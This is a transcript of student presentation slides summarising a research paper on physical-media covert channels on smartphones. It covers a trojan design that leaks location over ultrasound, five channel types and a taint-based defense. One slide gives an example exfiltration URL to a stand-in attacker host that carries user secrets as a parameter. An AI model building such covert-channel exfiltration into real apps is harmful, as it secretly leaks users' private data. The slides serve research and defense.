+ All Categories
Home > Technology > Physical media covert channels on smart mobile devices

Physical media covert channels on smart mobile devices

Date post: 13-Apr-2017
Category:
Upload: harshitha-chidananda-murthy
View: 341 times
Download: 1 times
Share this document with a friend
24
PHYSICAL MEDIA COVERT CHANNELS ON SMART MOBILE DEVICES -ED NOVAK ,YUTAO TANG, ZIJIANG HAO, QUN LI, YIFAN ZHANG Presenter: Harshitha Chidananda
Transcript
Page 1: Physical media covert channels on smart mobile devices

PHYSICAL MEDIA COVERT CHANNELS ON SMART MOBILE DEVICES -ED NOVAK ,YUTAO TANG, ZIJIANG HAO, QUN LI, YIFAN ZHANG

Presenter: Harshitha Chidananda

Page 2: Physical media covert channels on smart mobile devices

TABLE OF CONTENTS

Introduction Main problem Main points and

contributions Challenges Recent work

Strengths and Weaknesses

Open issues/ Direction of future research

My thoughts Summary and

conclusion

Key technical points PMCC Trojan Horse

Malware 5 example PMCCs Defense

mechanism Evaluation

Page 3: Physical media covert channels on smart mobile devices

Fundamental shift for computing • Carry sensitive information• Equipped with physical interface

hardware

Page 4: Physical media covert channels on smart mobile devices

MAIN PROBLEM

Device carry sensitive information about the user Malwares in many applications Applications access user’s information without permission

Page 5: Physical media covert channels on smart mobile devices

MAIN POINTS AND CONTRIBUTIONS

Information leakage malware Uses covert channels over physical “real-world” media, such as sound or light. First to use PMCC(Physical Media Covert Channels) Malware advantages:

New form Stealthy State-of-the-art defenses

Privilege escalation Information leakage

Defense mechanism Balances security with usability

Page 6: Physical media covert channels on smart mobile devices

CHALLENGES

Speed As little as 100 bits per second is enough to pose a serious threat

Stealth difficult to defend against. They must go unnoticed by the user Appear to be benign from the point of view of the software. Differentiate between benign and malicious sensor use Not interrupt the user with confirmation dialogs.

Page 7: Physical media covert channels on smart mobile devices

KEY TECHNICAL POINTS

Propose a new class of covert channels for smart mobile devices that utilize real world interfaces Generalized as “physical medium covert channels”- PMCC High stealth High speed

Design and implementation of five example PMCCs Use PMCCs to design a new variant of trojan horse malware

appears to be benign but actually leaks sensitive user information. Propose and implement a novel defense scheme that takes a framework approach. Evaluate prototypes of each covert channel and the defense mechanism.

Page 8: Physical media covert channels on smart mobile devices

RECENT WORK

Defense mechanisms Taint-analysis

Taint analysis can be used to identify sensitive information as it flows through an application and notifying the user or stopping this sensitive information from leaving the device and being leaked.

Elaborate security policy mechanisms Internal computation for security reasons

Application market curation Market curation techniques aim to identify and remove malicious applications from the market before users

even have a chance to install it.

Page 9: Physical media covert channels on smart mobile devices

PART 1:THREAT MODEL

Send information over the Internet without requesting the Internet permission Creating Applications that look normal Dual run using “ScheduledExecutorService” Android timing mechanism Accessing Sensitive Information

Android applications can ask the browser to open URLs on their behalf without declaring the

Internet permission. The attacker can include some

CGI parameters

(E.X., attackerhost.com/collector?usersecret=val)

transmit sensitive information to their own controlled host.

Page 10: Physical media covert channels on smart mobile devices

PART 2:TROJAN HORSE MALWARE DESIGN

Page 11: Physical media covert channels on smart mobile devices

Example Trojan Application — Jog-LogThe application asks for GPS and microphone permission

User uses jogging app while jogging

Later at night, app uses ScheduledExecutorService

Uses PMCC to transmit location information

Speaker is used to produce ultrasonic signalMicrophone is used to decode the ultrasound signalForms URL with the attacker’s host as a domain

User’s location as CGI parameterThe attacker sets up a special web server to respond to these requests

Records CGI parameters in a file associated with the IP address of the user

The attacker can now find the street address

Page 12: Physical media covert channels on smart mobile devices

PART 3: COVERT CHANNEL DESIGN Implementation of five physical media covert channels:

Ultrasound Speaker and Accelerometer Vibration and Accelerometer Flash and Camera User and Gyroscope

Page 13: Physical media covert channels on smart mobile devices

PART4 :DEFENSE SYSTEM ARCHITECTURE

Page 14: Physical media covert channels on smart mobile devices

PART 4: STAGE 1-GUARD SERVICE

GuardService exposes 3 methods: .add(component, device, tag) .remove(component, device) .lookup(component, device)

• Component begins using a sender device

• .add() is called• Taint-tag from the data flowing is stored in the

guardService

• .loopup() is called• Retrieve taint-tag from any active sender devices

• .remove() is called• When sender services are no longer needed

Page 15: Physical media covert channels on smart mobile devices

PART 4: STAGE 11 - TREATMENT

Alert the user weakest choice

Choose One One of the devices is turned off Tunable parameter

Dynamically Switch: Switch dynamically between two sensors.

Rate Limit For devices that needs 2 sensors to work(flash and camera) Limit the rate at which the device can be used

Altering the Signal Increase error rate Careful not to alter useful information

Page 16: Physical media covert channels on smart mobile devices

PART 5: EVALUATION

Page 17: Physical media covert channels on smart mobile devices

PART 5: EVALUATION

Page 18: Physical media covert channels on smart mobile devices

PART 5: EVALUATION

Page 19: Physical media covert channels on smart mobile devices

PART 5: EVALUATION

Page 20: Physical media covert channels on smart mobile devices

STRENGTHS AND WEAKNESSES

Strengths Good evaluation of each covert channel and defense

mechanisms Succeeds Good results Describes about developing a good malware Describes good defense mechanisms Easy to read

Weaknesses Repetitive No user study

Page 21: Physical media covert channels on smart mobile devices

OPEN ISSUES/ DIRECTION FOR FUTURE RESEARCH

Does not focus on the case where the attacker tries to use some physical medium covert channel to communicate with another proximal device.

Experiments on Apple smartphones Influence of defense mechanisms on performance

Page 22: Physical media covert channels on smart mobile devices

MY THOUGHTS

Simple English with few terms that needed to be Googled Pictorially eye catching Well explained Best way to make reader understand the importance of security Gave broader perception Realistic overview Good illustrations

Page 23: Physical media covert channels on smart mobile devices

SUMMARY AND CONCLUSION

First to use Physical Media Covert Channels Designed specifically for mobile devices New form of malware Novel Defense mechanism Alert community of potential threat

Page 24: Physical media covert channels on smart mobile devices

Thank You!QUESTIONS?


Recommended